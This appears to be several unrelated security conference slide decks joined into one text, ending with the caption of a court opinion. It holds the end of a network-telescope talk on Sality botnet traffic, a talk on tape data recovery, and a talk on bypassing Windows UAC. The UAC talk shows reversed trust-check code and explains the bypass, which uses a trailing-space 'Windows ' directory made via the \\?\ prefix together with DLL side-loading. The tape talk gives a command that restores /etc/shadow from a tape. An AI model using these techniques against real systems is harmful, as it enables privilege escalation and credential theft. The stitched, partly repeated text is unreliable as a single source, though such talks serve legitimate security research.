0x0010: 02ef 5f66 153d 2776 0026 8a67 0000 0000 .._f.='v.&.g....
0x0020: a800 0d13 2100 55e1 0149 f488 0134 9733 ....!.U..I...4.3
0x0030: 0038 0000 0005 0006 0000 .8........
66
What software has this bug?
67
Qihoo 360
• Verified product usage with CS users
• 360 Total Security Software License and Service
Agreement:
iii) The Upgrade module of the Software uses
peer-to-peer ("P2P") technology to improve
upgrade speed and efficiency of your
bandwidth usage. The P2P technology will
cause data to be uploaded, including program
modules and the Software's malware definition
database, which are used as components of
the Software. Your private data will not be
uploaded.
https://www.360totalsecurity.com/en/license/360-total-security/
68
Qihoo cleanup
• It took about a month from notification for there to be a significant decrease
in packets originating from bug
Qihoo
notified
New version
on website
2015/2016
Probably large
update events
69
Network telescopes capture a wealth of security-
related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
70
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3..
0x0020: 643e c2d4 2cf5 42b5 810f 7f01 5344 1e d>..,.B.....SD.
Making the unknown traffic known
• Further investigation into “unknown” traffic can reveal source of traffic
• Recall packet that appeared to have encrypted payload
• Lots of traffic to 1 IP address + statistical analysis of bytes + white
papers [1] => this packet is a Sality C&C
Related packet length
[1] Nicolas Falliere. Sality: Story of a Peer-to-Peer Viral Network.
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/
sality_peer_to_peer_viral_network.pdf, 2011."
71
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3..
0x0020: 643e c2d4 2cf5 42b5 810f 7f01 5344 1e d>..,.B.....SD.
Making the unknown traffic known
• Further investigation into “unknown” traffic can reveal source of traffic
• Recall packet that appeared to have encrypted payload
• Lots of traffic to 1 IP address + statistical analysis of bytes + white
papers [1] => this packet is a Sality C&C
Related packet length
RC4 Key
[1] Nicolas Falliere. Sality: Story of a Peer-to-Peer Viral Network.
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/
sality_peer_to_peer_viral_network.pdf, 2011."
72
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3..
0x0020: 643e c2d4 2cf5 42b5 810f 7f01 5344 1e d>..,.B.....SD.
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3..
0x0020: 0382 0000 0003 .... .... .... .... .. d>..,.B.....SD.
Making the unknown traffic known
• Further investigation into “unknown” traffic can reveal source of traffic
• Recall packet that appeared to have encrypted payload
• Lots of traffic to 1 IP address + statistical analysis of bytes + white
papers [1] => this packet is a Sality C&C
Version: 03
URL Pack Sequence ID:0x82000000
Command: 0x03 (Pack Exchange)
Related packet length
RC4 Key
[1] Nicolas Falliere. Sality: Story of a Peer-to-Peer Viral Network.
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/
sality_peer_to_peer_viral_network.pdf, 2011."
73
Scale of misconfiguration
• Like BitTorrent, Sality can have bogus information in its hash table that results
in many sources sending us packets
• 34 days in 2012: 386k IPs
• 34 days in 2013: 355k IPs
• Symantec 2011:
~300k infections
[1] Nicolas Falliere. Sality: Story of a Peer-to-Peer Viral Network.
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/
sality_peer_to_peer_viral_network.pdf, 2011."
74
Conclusion
• It’s likely your machines transmit Internet background
radiation
• Network telescopes capture a wealth of security-related
data
• Including somewhat complex attacks/bugs/misconfigurations
• Scanning trends
• Attacks on authoritative name severs
• BitTorrent index poisoning
• Qihoo 360 byte-order bug
• Misconfigurations in Sality botnet | pdf |
萬⽤劫持
本地提权
情報滲透
越級注入
PS C:\>
[System.Convert]::ToBase64String([System
ext.Encoding]::UTF8.GetBytes("PS
cmd.exe /c "dir"
141414141414141414141
AAAAAAAAAAAAAAAAAAAAAAA
[email protected]
遠程後⾨
網軍⾏動
Duplicate Paths Attack:
Get Elevated Privilege from Forged Identities
$_whoami
#Windows #Reversing #Pwn #Exploit
• Master degree at CSIE, NTUST
• Security Researcher - chrO.ot
• Speaker - BlackHat, DEFCON, VXCON, HITCON
• 30cm.tw
• Hao's Arsenal
• [email protected]
[email protected]
1. UAC Design
> Privilege Duplicate
> Double Trust Auth
2. Issues
> Path Normalization
3. A Combo, inject unlimited agents
$_cat ./agenda
[email protected]
〉〉〉UAC Design
[email protected]
$_cat ./uac
[email protected]
$_cat ./uac
[email protected]
$_cat ./uac
[email protected]
$_cat ./uac
[email protected]
$_cat ./uac
$ svchost.exe -k netsvcs -p -s Appinfo
說到創建Process事情,
對作業系統主要就是兩個問題:
(⼀)程式碼要擺哪裡
(⼆)執⾏緒該怎麼執⾏
syscall
Ring0
Ring3
Parent Process
(A.) CreateProcess
Child Process
(B.) Child Proess Created,
EXE File Mapped, Gained the Same Privilege
and New Thread pointed to RtlUserThreadStart
(C.)
Kernel Create a new Thread:
RtlUserThreadStart
→LdrInitializeThunk
→LdrpInitializeProcess
(D.) Jump into AddressOfEntry
AppInfo!RAiLaunchAdminProcess
syscall
Ring0
Ring3
Parent Process
(A.) RunAs,
CreateProcessAsUser or
CreateProcessWithToken
UAC Service
(B.) Send a task by RPC message to
UAC service for creating a different
privilege child process
RPC
Priv Auth
(C.) verify new process is
qualified or not
Child Process
Task Cancelled
Y
N
(D.) Child process is created
by CreateProcessAsUser
with specific token by Parent Process
syscall
Ring0
Ring3
Parent Process
(A.) RunAs,
CreateProcessAsUser or
CreateProcessWithToken
(B.) Send a task by RPC message to
UAC service for creating a different
privilege child process
RPC
(C.) verify new process is
qualified or not
Child Process
Task Cancelled
Y
N
(D.) Child process is created
by CreateProcessAsUser
with specific token by Parent Process
AppInfo!RAiLaunchAdminProcess
UAC Service
Priv Auth
UAC
Protection
Logic
Some points about UAC protection
we're interested in:
• How the UAC process verifies
processes get higher privilege
• Security issues
• Bypassing Vectors
syscall
Ring0
Ring3
Parent Process
(A.) RunAs,
CreateProcessAsUser or
CreateProcessWithToken
UAC Service
(B.) Send a task by RPC message to
UAC service for creating a different
privilege child process
RPC
Priv Auth
(C.) verify new process is
qualified or not
Child Process
Task Cancelled
Y
N
(D.) Child process is created
by CreateProcessAsUser
with specific token by Parent Process
AppInfo!RAiLaunchAdminProcess
[email protected]
只好⾃⼰動⼿逆向 QQ
當你以爲拜 Google ⼤神有解答,
但卻沒有。
if you can see me,
remember it's discovered by reversing
and not talked about on Internet.
I have no idea
it's correct or not :/
[email protected]
$_exec RunAs
[email protected]
void __fastcall RAiLaunchAdminProcess(
struct _RPC_ASYNC_STATE *rpcStatus,
RPC_BINDING_HANDLE rpcBindingHandle,
wchar_t *exePath,
wchar_t *fullCommand,
int dwCreationFlags,
LPVOID lpEnvironment,
wchar_t *lpCurrentDirectory,
unsigned __int16 *a8,
struct _APPINFO_STARTUPINFO *lpStartupInfo,
__int64 a10,
int millSecond,
struct _PROCESS_INFORMATION *lpProcessInformation,
unsigned int *a13)
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
$_./trustAuth_A
[email protected]
void AipCheckSecurePFDirectory(_UNICODE_STRING *exePath, uint *trustedFlag, __int64 caseSenstive)
{
*trustedFlag |= 0x2000u;
int pos = 0;
do
{
// \??\C:\Program Files\Windows Defender, \??\C:\Program Files (x86)\Windows Defender
// \??\C:\Program Files\Windows Journal, \??\C:\Program Files (x86)\Windows Journal
// \??\C:\Program Files\Windows Media Player, \??\C:\Program Files (x86)\Windows Media Player
// \??\C:\Program Files\Windows Multipoint Server
if ( RtlPrefixUnicodeString(&(&g_IncludedPF)[2 * pos], exePath, caseSenstive = true) )
break;
++pos;
}
while ( pos < 8 );
if ( pos != 8 ) *trustedFlag_1 |= 0x4000u; // 0x4000, trusted windows system application
}
$_./trustAuth_A
[email protected]
$_./trustAuth_A
[email protected]
$_./trustAuth_A
[email protected]
// \??\C:\Windows\System32\Sysprep\sysprep.exe
// \??\C:\Windows\System32\inetsrv\InetMgr.exe
int index = 0, pos = 0;
while ( !RtlEqualUnicodeString(
g_IncludedXmtExe[index ++], exeUni_FullPath, true) );
if (index < 2) {
if ( AipMatchesOriginalFileName(exeUni_FullPath) ) {
tmpTrustFlagToAdd |= (0x800000u | 0x200000u);
trustedFlag = tmpTrustFlagToAdd;
}
else {
tmpTrustFlagToAdd |= (0x400000u | 0x200000u);
trustedFlag = tmpTrustFlagToAdd;
}
}
else ...
$_./trustAuth_A
[email protected]
else {
// \??\C:\Windows\SysWow64\
// \??\C:\Windows\System32\
for (pos = 0; pos < 2; pos++)
if ( RtlPrefixUnicodeString(g_IncludedSysDir[pos], exeUni_FullPath,
true) )
break;
if (pos != 2) {
tmpTrustFlagToAdd |= 0x200000u;
trustedFlag = tmpTrustFlagToAdd;
}
}
$_./trustAuth_A
[email protected]
$_./trustAuth_B
[email protected]
$_./trustAuth_B
[email protected]
filemappingPtr = CreateFileMappingW(exeFileHandle, 0i64, 0x11000002, 0, ...);
if ( filemappingPtr ) {
exeRawData = MapViewOfFile(filemappingPtr, 4u, 0, 0, 0i64);
if ( exeRawData )
if ( LdrResSearchResource(exeRawData, &buf, 3i64, 48i64 ..., 64) >= 0 ) {
actCtx = CreateActCtxW(&Dst);
if ( actCtx != -1i64 ) {
if ( QueryActCtxSettingsW(
0, actCtx, 0i64, L"autoElevate", &pvBuffer, ...) )
// pvBuffer = (wchar_t*)L"true"
// tryAutoElevFlag = ( 't' - 'T'(0x54) & 0xffdf ) == 0 --> case insentive
tryAutoElevFlag = ((pvBuffer - 'T') & 0xFFDF) == 0;
...
if ( tryAutoElevFlag )
goto markedAutoElev;
$_./trustAuth_B
[email protected]
tryToVerify:
...
tryAutoElevFlag = false;
filemappingPtr = CreateFileMappingW(exeFileHandle, 0i64, 0x11000002, 0, ...);
if ( filemappingPtr ) {
exeRawData = MapViewOfFile(filemappingPtr, 4u, 0, 0, 0i64);
if ( exeRawData )
if ( LdrResSearchResource(exeRawData, &buf, 3i64, 48i64 ..., 64) >= 0 ) {
actCtx = CreateActCtxW(&Dst);
if ( actCtx != -1i64 ) {
if ( QueryActCtxSettingsW(
0, actCtx, 0i64, L"autoElevate", &pvBuffer, ...) )
// pvBuffer = (wchar_t*)L"true"
// tryAutoElevFlag = ( 't' - 'T'(0x54) & 0xffdf ) == 0 --> case insentive
tryAutoElevFlag = ((pvBuffer - 'T') & 0xFFDF) == 0;
...
if ( tryAutoElevFlag )
goto markedAutoElev;
markedAutoElev:
if ( _wcsicmp(L"mmc.exe", *mmc) )
{
// autoElev request marked flag
*trustFlag |= 0x1010000u;
goto bye;
}
// ... chk for the arguments for mmc
$_./trustAuth_B
[email protected]
$_./trustAuth_B
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
AiLaunchProcess:
Create Suspended Consent Process
by CreateProcessAsUserW
[email protected]
AiLaunchProcess:
Create Suspended Consent Process
by CreateProcessAsUserW
AipVerifyConsent:
Verify consent not patched by
ReadProcessMemory
[email protected]
AiLaunchProcess:
Create Suspended Consent Process
by CreateProcessAsUserW
AipVerifyConsent:
Verify consent not patched by
ReadProcessMemory
[email protected]
Consent process gets awake, checks the
"trustFlag", and decides to display
alert UI or not.
[email protected]
AiLaunchProcess:
Create Suspended Consent Process
by CreateProcessAsUserW
AipVerifyConsent:
Verify consent not patched by
ReadProcessMemory
[email protected]
[email protected]
[email protected]
High Priv
Low Priv
Priv Low to High
Timeline
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
〉〉〉Issue
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
> TenableSecurity: UAC Bypass by Mocking Trusted
Directories by David Wells
> Google Project Zero: The Definitive Guide on Win32 to
NT Path Conversion by James Forshaw
> MSDN Developer Blog:
Path Normalization by Jeremy Kuhne
Path Format Overview by Jeremy Kuhne
/?path_Normaliz
[email protected]
/?path_Format
DOS Paths (2.0)
C:\Test\Foo.txt
A full volume name. If it doesn't start with all 3
characters it is considered to be partially
qualified or relative to the current directory.
[email protected]
/?
UNC Paths
\\Server\Share\Test\Foo.txt
start with two separators. The first component is
the host name (server), which is followed by the
share name.
path_Format
[email protected]
/?
DOS Device Paths
\\.\C:\Test\Foo.txt
path_Format
\\?\C:\Test\Foo.txt
\\.\UNC\Server\Share\Test\Foo.txt
\\?\UNC\Server\Share\Test\Foo.txt
[email protected]
• Identifying the Path and Legacy Devices
• Applying the Current Directory
• Canonicalizing Separators
• Evaluating Relative Components
• Trimming Characters
• Skipping Normalization
/?path_Normaliz
Path Normalization by Jeremy Kuhne
[email protected]
• Identifying the Path and Legacy Devices
• Applying the Current Directory
• Canonicalizing Separators
• Evaluating Relative Components
• Trimming Characters
• Skipping Normalization
/?path_Normaliz
Path Normalization by Jeremy Kuhne
If the path doesn't end in a separator, all trailing
periods and \x20 will be removed. If the last segment
is simply a single or double period it falls under
the relative components rule above.
This rule leads to the possibly surprising ability
to create a directory with a trailing space. You
simply need to add a trailing separator to do so.
[email protected]
• Identifying the Path and Legacy Devices
• Applying the Current Directory
• Canonicalizing Separators
• Evaluating Relative Components
• Trimming Characters
• Skipping Normalization
/?path_Normaliz
Path Normalization by Jeremy Kuhne
An important exception- if you have a device
path that begins with a question mark instead of
a period. It must use the canonical backslash-
if the path does not start with exactly
\\?\ it will be normalized.
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
/?Issue
[email protected]
$p =
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
GetLongPathNameW(pathInput)
)
/?trustAuth_A
[email protected]
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
GetLongPathNameW(L"C:\sea\food \seafood.exe")
)
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
L"C:\sea\food\seafood.exe"
)
$p = L"\??\C:\sea\food\seafood.exe"
/?trustAuth_A
AiLaunchProcess(L"C:\sea\food \seafood.exe")
[email protected]
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
GetLongPathNameW(L"C:\Windows \System32\a.exe")
)
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
L"C:\Windows\System32\a.exe"
)
$p = L"\??\C:\Windows\System32\a.exe"
/?trustAuth_A
AiLaunchProcess(L"C:\Windows \System32\a.exe")
[email protected]
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
GetLongPathNameW(L"C:\Windows \System32\a.exe")
)
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
L"C:\Windows\System32\a.exe"
)
$p = L"\??\C:\Windows\System32\a.exe"
/?trustAuth_A
AiLaunchProcess(L"C:\Windows \System32\a.exe")
We have no privilege to write files inside
C:\Windows\System32 due to Windows DACL
But it's okay for us to create a
dictionary "Windows\x20" via the \\?\
prefix to avid Path Normalization
[email protected]
〉〉〉Combo
[email protected]
• TrustAuth_A
- Path Normalization Issues
→ \\?\ prefix to bypass
• TrustAuth_B
- Whitelisted EXE Files with Trusted Signature
- AutoElevated Marked EXE Files
→ DLL Side-Loading Tricks to hijack AutoElevated Marked
EXE Files
/?attack Vectors
[email protected]
$_payload?
[email protected]
$_Siofra
github.com/Cybereason/siofra
[email protected]
$_Siofra
[email protected]
$_Siofra
$_ DEMO
[email protected]
• TrustAuth_A used for verifying child process launched
from a trustable dircctory
• if trusted, TrustAuth_B check child process signed with
legal signature or marked as AutoElevate
• Consent.exe launched, and the UAC prompt pops up if
child process isn't full trusted
• TrustAuth_A/B is an extra design. The different paths
between verification and Forking Process lead to EoP
$_./Recap
萬⽤劫持
本地提权
情報滲透
越級注入
PS C:\>
[System.Convert]::ToBase64String([System
ext.Encoding]::UTF8.GetBytes("PS
cmd.exe /c "dir"
141414141414141414141
AAAAAAAAAAAAAAAAAAAAAAA
[email protected]
遠程後⾨
網軍⾏動
Thanks!
Slide
Github
@aaaddress1
Facebook | pdf |
When tapes go missing.....
Robert Stoudt
IBM-ISS
[email protected]
“It is important for customers to note that these tapes cannot
be read without specific computer equipment and software.”
“The missing tapes require a tape drive to be read, and cannot
be viewed from a PC”
“The administration continues to maintain that it does not
believe the information has been accessed because it would
require specific hardware, software and expertise.”
Game Time
“It is important for customers to note that these tapes cannot be read without
specific computer equipment and software.”
President & CEO Hortica Robert McClellan
“The missing tapes require a tape drive to be read, and cannot be viewed from a
PC”
IBM spokesman Fred McNeese
“.... continues to maintain that it does not believe the information has been accessed
because it would require specific hardware, software and expertise.”
Ohio State "The administration"
When tapes go missing.....
Agenda
Reported cases in the media
Cost of losing media
Data Breach Laws
Recovering the data
Protecting Your Media
'Reported' cases of lost media
July 4, 2007 – Ohio – 400,000 State employees, Taxpayers, Schools,...
Apr. 6, 2007 – Hortica – SSN, DL, Bank Acc
May 15, 1007 – IBM – SSN, DOB, Addresses
Jan. 19, 2007 – U.S. IRS via City of Kansas City – 26 tapes.......
Sept. 7, 2006 – Circuit City and Chase – 2.6 million cardholders
June 6, 2005 – CitiFinancial – 3,900,000
* http://www.privacyrights.org/ar/ChronDataBreaches.htm
At what COST
Impact to the company:
− trade secrets
− confidential financial information
− customer data
− employee data
− company image
Civil Damages
− Tech//404® Data Loss Cost Calculator
examples given ranging from $1,000-$21,000 pp
http://www.tech-404.com/calculator.html
Case in point - Ohio
Akron Beacon Journal - Stolen tape
The state is paying more than $700,000 to provide all
state employees with identity-theft protection services
and to hire an independent computer expert to review
what data the tape contained.
Tape stolen June 10 from unlocked car of a intern
“who had been designated to take the backup device
home as part of a standard security procedure”.
"The administration continues to maintain that it
does not believe the information has been
accessed because it would require specific
hardware, software and expertise.”
http://www.ohio.com/mld/beaconjournal/news/state/17395223.htm
Losing the tapes
Theft
Lost in Transit
End of Life/Discarding media
− Ebay
− Corporate auctions
− Dumpster Diving
Case study
Out of 20 DLT tapes purchased from various
vendors on e-bay
− 1 physically damaged
− 2 data unreadable due to hardware
− 5 were short erased
− 12 were corporate backups
Do you securely erase your data?
Do you securely DESTROY your tapes?
Data Breach Notification Laws:
Disclaimer: I am not a lawyer nor do I wish to
be one. Consult your legal counsel.
US State Laws
Each state which has a Data Breach law can
define:
− What constitutes personal data
Name, Address, SSN, CC, Biometrics, Driver Lic
num, account num,...... or a combination thereof
− Encryption exemption (even poor encryption?)
− Obfuscated data exempted
− Timelines for notifications
− Allowed methods of notification
VigilantMinds has summarized laws as of
Feb `07 by state at:
http://www.solutionary.com/pdfs/vm/breach_matrix_feb07_email.pdf
VigilantMinds Law Matrix
US Federal Laws
Current Federal laws are lax
Safe Harbor
− Allows companies to "self-certify"
− http://www.export.gov/safeharbor/
At least 6 new House/Senate bills are being
proposed
− Senate Bill 239 (the Notification of Risk to
Personal Data Act of 2007)
− Senate Bill 1178 (the Identity Theft Prevention
Act)
The other 193 Countries
EU Privacy Directive 95/46/EC
− Attempting to “harmonize” data protection
legislation
− Requires data transferred out be limited to only
those countries that ensure an adequate level
of protection.
http://ec.europa.eu/justice_home/fsj/privacy/overview/index_en.htm
http://www.informationshield.com/intprivacylaws.html
http://www.privacyinternational.org search on ”Data Protection and
Privacy Laws”
Recovering the data
Drives
DLT, 8mm, 4mm, LTO.....
Recording Formats
Helical scan
Longitudinal Recording
...........
Does it matter?
SuperDLT
110
5
10
20
100
DAT - DDS1
2
DAT - DDS2
4
DAT - DDS3
12
DAT - DDS4
40
Exabyte
2.3/5/7
20
60
Sony AIT - 1
25/35
Sony AIT - 2
50
Magstar MP
3570
Magstar 3590-
B
Magstar 3590-
E
IBM 3580
(Ultrium)
Exabyte -
Mammoth
Exabyte -
Mammoth II
Forensics
Papers
− Forensic acquisition and analysis of magnetic
tapes by Bruce J. Nikkelf
http://www.digitalforensics.ch/nikkel05.pdf
− Tape Media Forensic Analysis
http://www.expertlaw.com/library/forensic_evidence/ta
pe_media.html
3rd party services
− Neohapsis
http://www.neohapsis.com/services/5.html
− Vogon
http://www.vogon-international.com/tape-
recovery/tape-recovery.htm
Forensics
Not as simple nor complete as HDD
forensics
DD can create a 'near complete' image
Miss Slack space in EOF and EOD markers
Limited to what tape drive is able to read
Drive firmware can prevent access to
significant portions of media
Short erase
EndofData (EOD) marker
Defeatable with customized firmware and ....
Recovering the data
EOD's enforcement based on drive and
firmware
Powering drive off during write *may*
overwrite EOD marker
Recovering the data
Steps under Linux to baseline a tape
− Obtain tape information
tapeinfo -f <SGTapeDrive>
− Set tape block size to be variable
mt -f <TapeDrive> setblk 0
− Using 'dd' aquire a copy of data
dd if=<TapeDrive> of=<localcopy> bs=256k
− Repeat 'dd' to image every file on tape upto EOD
Recovering the data
TAPECAT - Tape utility command
− Automates review of the tape
− Provides tape filesize and data type information
− Has code to read detailed information on Amanda tapes
− Able to dump portions of files
− http://www.inventivetechnology.at/tapecat/
Use original backup utility to restore data/obtain
information
− Common Backup Software
Amanda, ARCserve, TAR, ufsdump/dump, Windows NTBackup, Tivoli
Storage Manager (TSM)
− Cons
Cost of license
Not all applications can import rogue tapes
Tivoli Storage Manager (TSM)
Unique backup solution in that it only
performs incremental backups
Database is the heart of TSM server, it tracks
data's life on tapes
No built-in method to 'import' data from an
unknown tape (if its not in the DB it doesn’t
exist)
While tapes are filled with data TSM starts
“expiring” old data
TSM expiration in action
• TSM Tracks 'current' files via DB
• When a file is 'expired' it still remains on tape
– Unrestorable unless DB is reverted to time prior to expiration
• Causes tape utilization to drop until reclamation threshold is
hit
TSM Tape Layout
First file is the 'Tape Label'
− Uses IBM871 character set
− When translated into ISO-8859-1 it reads:
VOL1100227
HDR1ADSM.BFS.V000177A 0001
006345 993650000000ADSM
HDR2U2621400000 0
TSM Data files
<snipit>
000000b0 00 00 00 00 00 00 00 00 4d 41 59 41 4c 69 6e 75 |........MAYALinu|
000000c0 78 38 36 53 54 41 4e 44 41 52 44 2f 64 61 74 61 |x86STANDARD/data|
000000d0 31 2f 68 6f 6d 65 2f 72 65 70 6c 61 79 2f 2e 72 |1/hom e/replay/.r|
000000e0 65 70 6c 61 79 50 68 6f 74 6f 43 61 63 68 65 2f |eplayPhotoCache/|
000000f0 46 61 6d 69 6c 79 20 52 6f 6f 6d 2f 44 75 62 6c |Fam ily Room /Dubl|
00000100 69 6e 2d 47 75 69 6e 65 73 73 20 4d 75 73 65 75 |in-Guiness Museu|
00000110 6d 2f 69 6d 61 67 65 73 2f 50 34 31 31 30 39 36 |m /im ages/P411096|
00000120 35 2e 4a 50 47 53 54 41 4e 44 41 52 44 44 45 46 |5.JPGSTANDARDDEF|
00000130 41 55 4c 54 72 65 70 6c 61 79 07 07 16 00 4e 0c |AULTreplay....N.|
00000140 00 01 00 00 00 00 00 10 94 0b 02 49 04 00 05 00 |...........I....|
00000150 04 00 00 6b 62 00 00 81 a4 00 00 01 fb 00 00 27 |...kb..........'|
00000160 12 3f c1 8e 03 3f c1 8e 0d 00 00 00 00 3f c1 8e |.?...?.......?..|
00000170 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 |................|
000001a0 00 00 05 00 00 00 00 00 04 02 00 00 00 00 00 10 |................|
000001b0 94 0b ff d8 ff e1 38 45 45 78 69 66 00 00 49 49 |......8EExif..II|
<snipit> ..........
Recovering TSM Tapes
Able to recover client name, architecture and file name
using simple dd | strings | grep
Could manually save out each file to recover binary data
Able to view text files (ie, passwd, shadow, ...)
AdsmTape written by Thorhallur Sverrisson
Currently only supports ADSM v2 and v3
Written for AIX
http://sourceforge.net/projects/adsmtape/
Introducing TSMtape
TSMtape recovers files from a Tivoli Storage
Manager (TSM) v5.x(tested against 5.2) tape.
Based off adsmtape written by Thorhallur
Sverrisson.
It can restore your files or audit the tape
Provides a csv report of file stats
Download it now from
http://sourceforge.net/projects/tsmtape
TSMtape
Usage:
./TSMtape [-R|restore] <device> <Files> <Restore Path>
or
./TSMtape [-A|--audittape] <device> <output file>
Options:
-h, --help display this help and exit
-A, --audit Output list of files stored on tape with supporting details in csv
format
-R, --restore Restore "your" files ;-)
<Files> File parsing can be a partial or full path, Use a '/' as a catchall
-v[vv] Print additional debugging information
i.e.
./TSMtape --restore /dev/st0 /etc/shadow /tmp/recovered
./TSMtape --audit /dev/st0 / /tmp/tapefiles.csv
TSMtape output
./TSMtape --restore /dev/st0 / ./restore 2> ./restore/errors
Using device /dev/st0
Volume label: 100227
Positioning to data
B MAYA - 1086475 /data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110965.JPG
Restoring ==> ./restore//data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110965.JPG
B MAYA - 1098848 /data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110966.JPG
Restoring ==> ./restore//data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110966.JPG
B MAYA - 1089845 /data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110967.JPG
Restoring ==> ./restore//data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110967.JPG
TSMtape restorelog.csv
Node
OS
Domain
Mgmt1
Mgmt2
User
File Type Storage inode
MAYA Linux86 STANDARD STANDARD DEFAULT replay -
B
27490
MAYA Linux86 STANDARD STANDARD DEFAULT replay -
B
27491
MAYA Linux86 STANDARD STANDARD DEFAULT replay -
B
27492
MAYA Linux86 STANDARD STANDARD DEFAULT replay -
B
27493
./TSMtape started: Wed Aug 1 13:11:29 2007
Volume label: 100227
Permissions UID GID
Backup Date
Size
FileSpace Filename
-rw-r--r--
507
10002
11/24/03 04:50 AM
1086475 /data1
/..../images/P4110965.JPG
-rw-r--r--
507
10002
11/24/03 04:50 AM
1098848 /data1
/..../images/P4110966.JPG
-rw-r--r--
507
10002
11/24/03 04:50 AM
1089845 /data1
/..../images/P4110967.JPG
-rw-r--r--
507
10002
11/24/03 04:50 AM
974922 /data1
/..../images/P4110968.JPG
Mitigation
How to protect your data
− Inventory, Can’t protect what you don’t know
− Data encryption
Client/server side
Tape drive (LTO4)
− Data Destruction standards/requirements
Mitigation
Wiping/Erasing
− The Eliminator
4000FS is a belt-
driven Degausser
specifically
engineered to erase
high-coercivity Hard
Disk Drives, Super
DLT tape, and DLT
IV tape.
http://www.periphman.com/degaussing/d
egaussers/4000fs.shtml
Mitigation
Complete Destruction
− Do-it-yourself destruction
Bash it, Heat it, Smelt it, Microwave it, Shred it
− http://www.networkworld.com/research/2007/041107-data-
destruction-methods.html
− The fine art of data destruction
Pulverize, then liquefy
− http://www.techworld.nl/idgns/2924/the-fine-art-of-data-
destruction.html
− Personal favorite, Thermite!
Thermite
When tapes go missing.....
Q & A
Robert Stoudt
IBM-ISS
[email protected] | pdf |
FOR PUBLICATION
UNITED STATES COURT OF APPEALS
FOR THE NINTH CIRCUIT
MDY INDUSTRIES, LLC,
Plaintiff-counter-defendant-
Appellant,
v.
No. 09-15932
BLIZZARD ENTERTAINMENT, INC. and
VIVENDI GAMES, INC.,
D.C. No.
Defendants-third-party-plaintiffs-
2:06-CV-02555-
Appellees,
